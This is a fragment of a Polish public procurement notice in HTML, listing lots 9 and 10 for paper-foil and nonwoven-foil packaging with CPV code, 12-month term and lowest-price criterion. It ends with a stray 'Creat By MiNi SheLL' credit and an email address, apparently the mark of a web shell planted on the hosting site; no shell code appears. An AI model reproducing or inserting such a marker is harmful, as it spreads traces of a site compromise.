<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 2 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> rękawy papierowo-foliowe bez fałdy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 2 części.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> opakowania włóknionowo- foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 2 części.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com